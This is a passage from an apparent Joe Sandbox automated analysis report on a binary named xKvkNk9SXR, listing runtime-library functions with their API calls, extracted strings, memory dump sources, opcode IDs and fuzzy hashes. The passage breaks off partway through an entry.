                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: w#G!$w#G!
                                          • API String ID: 0-1134387879
                                          • Opcode ID: 0f3dc7b8cc27284856c6fceac4bee7f93856b880c232046937d42e8fb476b884
                                          • Instruction ID: 81d0ae10fe87d08a9532aaca703d40727a2b90e1bb4b0286b54f930b75fa5ba3
                                          • Opcode Fuzzy Hash: 0f3dc7b8cc27284856c6fceac4bee7f93856b880c232046937d42e8fb476b884
                                          • Instruction Fuzzy Hash: 4FB18E71D00259DFCB15CFA8C840BEEBBB5FF49314F24462AE925AB381D774A945CB90
                                          Function 009F4AD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009F4D52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: is not a valid key length$w#G!
                                          • API String ID: 2659868963-2964869908
                                          • Opcode ID: a314df3622f34bf9e967324f03fdc45e53ad36194dd99ae42c97e638edd1f61f
                                          • Instruction ID: 466217ea5bbfdb37247e1e0d45738eed0561191c279d93205a9ddf51564b66ae
                                          • Opcode Fuzzy Hash: a314df3622f34bf9e967324f03fdc45e53ad36194dd99ae42c97e638edd1f61f
                                          • Instruction Fuzzy Hash: 2381E271A102489FDB15DFA8C885BDEFBB9FF89314F208619E415A7381D774AA84CB90
                                          Function 009B2590 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009B2726
                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 009B27C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_exception_copy___std_exception_destroy
                                          • String ID: w#G!
                                          • API String ID: 2970364248-519468572
                                          • Opcode ID: 72c48ae63c98f5158b65ac3e608f3544a2b247a0a252c1081f36b9713c28a03a
                                          • Instruction ID: 55d984cf552c2362963b108b59a8e6e7003c276008ec568dde9af128a4dc4151
                                          • Opcode Fuzzy Hash: 72c48ae63c98f5158b65ac3e608f3544a2b247a0a252c1081f36b9713c28a03a
                                          • Instruction Fuzzy Hash: D8719F71E10248DBDB05DFA8C981BDEFBB5FF49310F148219E815A7281DB74A984CBA5
                                          Function 009EEC10 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 201COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 009EFC20: ___std_exception_copy.LIBVCRUNTIME ref: 009EFC6B
                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 009EEEAE
                                            • Part of subcall function 00A4079A: EnterCriticalSection.KERNEL32(00AD87E8,00AD9528,?,?,00A148C1,00AD7168,21472377,00AD9528,?,?,00000000,00A8DADF,000000FF,?,00A1497C,00000001), ref: 00A407A5
                                            • Part of subcall function 00A4079A: LeaveCriticalSection.KERNEL32(00AD87E8,?,00A148C1,00AD7168,21472377,00AD9528,?,?,00000000,00A8DADF,000000FF,?,00A1497C,00000001), ref: 00A407E2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave___std_exception_copy___std_exception_destroy
                                          • String ID: bad allocation$w#G!
                                          • API String ID: 1690483291-2551379104
                                          • Opcode ID: 549c5551d369bc1509f49fca382315408ccc07edb25e9e056c2a124d9387ae7c
                                          • Instruction ID: 8df348ef31f11b702b9c14efe1811eb2d6403f5767c12c0a38b33418281805d4
                                          • Opcode Fuzzy Hash: 549c5551d369bc1509f49fca382315408ccc07edb25e9e056c2a124d9387ae7c
                                          • Instruction Fuzzy Hash: 729145B4E013488FDB11CFA8D984A9EBBF4FF48714F148129E80AAB351D774A945CF90
                                          Function 009EEF00 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 201COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 009EFCD0: ___std_exception_copy.LIBVCRUNTIME ref: 009EFD1B
                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 009EF19E
                                            • Part of subcall function 00A4079A: EnterCriticalSection.KERNEL32(00AD87E8,00AD9528,?,?,00A148C1,00AD7168,21472377,00AD9528,?,?,00000000,00A8DADF,000000FF,?,00A1497C,00000001), ref: 00A407A5
                                            • Part of subcall function 00A4079A: LeaveCriticalSection.KERNEL32(00AD87E8,?,00A148C1,00AD7168,21472377,00AD9528,?,?,00000000,00A8DADF,000000FF,?,00A1497C,00000001), ref: 00A407E2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave___std_exception_copy___std_exception_destroy
                                          • String ID: bad exception$w#G!
                                          • API String ID: 1690483291-1382357841
                                          • Opcode ID: 5e4908f5b35a9a685d6183d88c1ddac221d6455c7029bfd14bbd9519ab32f5a0
                                          • Instruction ID: 0ab1f040984c16070693f3c17175321fcf85e6ea32af72bcb48ce2189d6fa0e4
                                          • Opcode Fuzzy Hash: 5e4908f5b35a9a685d6183d88c1ddac221d6455c7029bfd14bbd9519ab32f5a0
                                          • Instruction Fuzzy Hash: 20913774E01348CFDB11CFA9D994A9EBBF5FB89314F14812AE80AAB351D774A905CF90
                                          Function 00A6C88D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 00A6C91D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__start
                                          • String ID: pow
                                          • API String ID: 3213639722-2276729525
                                          • Opcode ID: 2216251b553e4b9fb20fff414df468854447c560ae470e979885702dc3bb883d
                                          • Instruction ID: 926c186a309bb76eb773079da03f01bdd7e8ed97ffd5c39c4f0cebd650a369fe
                                          • Opcode Fuzzy Hash: 2216251b553e4b9fb20fff414df468854447c560ae470e979885702dc3bb883d
                                          • Instruction Fuzzy Hash: FE516072A08106E6DB15B798CD413BE27B0DBE0760F30CD59F0D9821E9EB34CC969A87
                                          Function 009C69E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ($w#G!
                                          • API String ID: 0-1372456508
                                          • Opcode ID: 37ae9be2d39bcb46380f28492c54cdbc041863e1b0863a35f90dad0ff6f7577a
                                          • Instruction ID: ea95bf657472df1c00cb54cca1f19175819622f5a0c2b9bd0faa0777f71fdee4
                                          • Opcode Fuzzy Hash: 37ae9be2d39bcb46380f28492c54cdbc041863e1b0863a35f90dad0ff6f7577a
                                          • Instruction Fuzzy Hash: 6F716730D04258DBDF25DBA9C845BEEBBB9BF48310F1441A9E519A3292DB709A44CF61
                                          Function 00A7C30B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A7BEDE: GetOEMCP.KERNEL32(00000000,?,?,00A7C167,?), ref: 00A7BF09
                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A7C1AC,?,00000000), ref: 00A7C37F
                                          • GetCPInfo.KERNEL32(00000000,00A7C1AC,?,?,?,00A7C1AC,?,00000000), ref: 00A7C392
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CodeInfoPageValid
                                          • String ID: w#G!
                                          • API String ID: 546120528-519468572
                                          • Opcode ID: 3f813832b84cc516f7cedfb84451c802110cb5ef67cc107972f1d061d23148cb
                                          • Instruction ID: 569bdab379bceeda7900bc261e9073e9006c9185521801c63fefc270c8e8ae67
                                          • Opcode Fuzzy Hash: 3f813832b84cc516f7cedfb84451c802110cb5ef67cc107972f1d061d23148cb
                                          • Instruction Fuzzy Hash: 7E512370A002459EDB24CF75CC99ABBBBF9EF41320F18C46ED09E9B252D7359946CB90
                                          Function 00A02EE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A0307E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: Integer: input length is too small$w#G!
                                          • API String ID: 2005118841-3991733091
                                          • Opcode ID: 713d75a2f4c874d14ac5e8d8d6b1eed0939714d4ab5cba22f3862dcda0439ca9
                                          • Instruction ID: ecd68395c2b903439cbd624e21f780a4dfe51fa0faf54c427fed1aa7ffc1e69a
                                          • Opcode Fuzzy Hash: 713d75a2f4c874d14ac5e8d8d6b1eed0939714d4ab5cba22f3862dcda0439ca9
                                          • Instruction Fuzzy Hash: 0751E731A0021A9FCF18DFA4D895BAEB7B5FF45350F044569E812EB385E730E914CB90
                                          Function 009F4DA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 139COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009F4F02
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: : this object doesn't support multiple channels$w#G!
                                          • API String ID: 2659868963-3326484628
                                          • Opcode ID: 07054bc787df9410367ff2560f7b1e6273df211eb132157158f2874a4928b474
                                          • Instruction ID: 8f78218583d477bff3911277b9c1c60fa912ae39bd2562ec7b6a22fb2ec93499
                                          • Opcode Fuzzy Hash: 07054bc787df9410367ff2560f7b1e6273df211eb132157158f2874a4928b474
                                          • Instruction Fuzzy Hash: 4551B472910609AFCB15DF55D841B9EFBF8FF49710F10861AE511A7780E774AA44CFA0
                                          Function 00A10760 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A107BF
                                            • Part of subcall function 00A57BC4: ___unDName.LIBVCRUNTIME ref: 00A57BF0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Name___std_type_info_name___un
                                          • String ID: ThisObject:$w#G!
                                          • API String ID: 642245251-721299124
                                          • Opcode ID: bf4a088c9a0ab91b74b7eaed745657383c6889463f19af05e20c82cd10f0c50b
                                          • Instruction ID: 78e357f60f762c901eb38348132d808ccecc32977b980758465bcc39c0c88b3c
                                          • Opcode Fuzzy Hash: bf4a088c9a0ab91b74b7eaed745657383c6889463f19af05e20c82cd10f0c50b
                                          • Instruction Fuzzy Hash: 9F510270A042489FDB14DFA8C940BEEBBB1FF49310F14825DE405A7382DBB49A85CBA0
                                          Function 00A10920 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A1097F
                                            • Part of subcall function 00A57BC4: ___unDName.LIBVCRUNTIME ref: 00A57BF0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Name___std_type_info_name___un
                                          • String ID: ThisObject:$w#G!
                                          • API String ID: 642245251-721299124
                                          • Opcode ID: 6ec3045b97ca65ec306d401184fc267d2ae86ee64f17fe8b73c367aa9ee65152
                                          • Instruction ID: 94f3dfd9e9f5fb69c7a45defa29af38ea43d71aac7f0ad34148157b729ad9c9e
                                          • Opcode Fuzzy Hash: 6ec3045b97ca65ec306d401184fc267d2ae86ee64f17fe8b73c367aa9ee65152
                                          • Instruction Fuzzy Hash: 5651F070A003489FDB14DFA8C940BEEBBB1EF49310F14861DE445A7382D7B59A85CBA0
                                          Function 00A782F7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A7833E
                                          • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00A783BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: w#G!
                                          • API String ID: 1834446548-519468572
                                          • Opcode ID: 7ede5a8268d2804cad36f282d54f79793bb28227f149abd4c98998e981c0c08c
                                          • Instruction ID: f0be24e4719599446288ee340f3dc56cc420bfbfae43849318119ebd6efc1442
                                          • Opcode Fuzzy Hash: 7ede5a8268d2804cad36f282d54f79793bb28227f149abd4c98998e981c0c08c
                                          • Instruction Fuzzy Hash: A641E331A40156AFDB20CF64CD84BEA77B6EF48314F14C1A9E54D9B141EBB9DE82CB90
                                          Function 00A06230 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A06388
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: Integer: Min must be no greater than Max$w#G!
                                          • API String ID: 2005118841-393831224
                                          • Opcode ID: 63cad4c877f5b07fb177585ffe5aa28ce7673331908aed5b747ef08f8e55cb6f
                                          • Instruction ID: 591d32843bab4cf6cdc1f559d472fce87c63d9a1b20f7ee2a6ae606f7b85418a
                                          • Opcode Fuzzy Hash: 63cad4c877f5b07fb177585ffe5aa28ce7673331908aed5b747ef08f8e55cb6f
                                          • Instruction Fuzzy Hash: 7941E472D0021CABCB14DFE4D955BEEB7B9FF49314F140529E805AB281EB31AE05CBA1
                                          Function 00A36B6E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: H_prolog3_ctype
                                          • String ID: %.0Lf
                                          • API String ID: 2548254987-1402515088
                                          • Opcode ID: 0f36c2bd863a315aa33849daa808e6c4091e87ef79708ab9c77eea30ecef6413
                                          • Instruction ID: 631cc38ac22591065cef8c87a6b0aed29580396962da550c270a54cdee2ac809
                                          • Opcode Fuzzy Hash: 0f36c2bd863a315aa33849daa808e6c4091e87ef79708ab9c77eea30ecef6413
                                          • Instruction Fuzzy Hash: C1418672E00218ABCF05EFD4CD49BEEBBB9EB04310F108548F855AB295DB759A19CF90
                                          Function 00A36E0E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: H_prolog3_ctype
                                          • String ID: %.0Lf
                                          • API String ID: 2548254987-1402515088
                                          • Opcode ID: 0802456202f8eb704d363c0287e1b78fe8a48ac3da5299287850e052709542b4
                                          • Instruction ID: dd7f8c4efc04cc652227c36de618e3f8ce1d6ac8289edd1ae0bdd809d70f0d3a
                                          • Opcode Fuzzy Hash: 0802456202f8eb704d363c0287e1b78fe8a48ac3da5299287850e052709542b4
                                          • Instruction Fuzzy Hash: 28416476E00208ABCF05EFD4C845BDEBBB9BB04311F208548F855AB2A5DB759A198B90
                                          Function 009FC2B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FC41E
                                            • Part of subcall function 009F4760: __CxxThrowException@8.LIBVCRUNTIME ref: 009F47FD
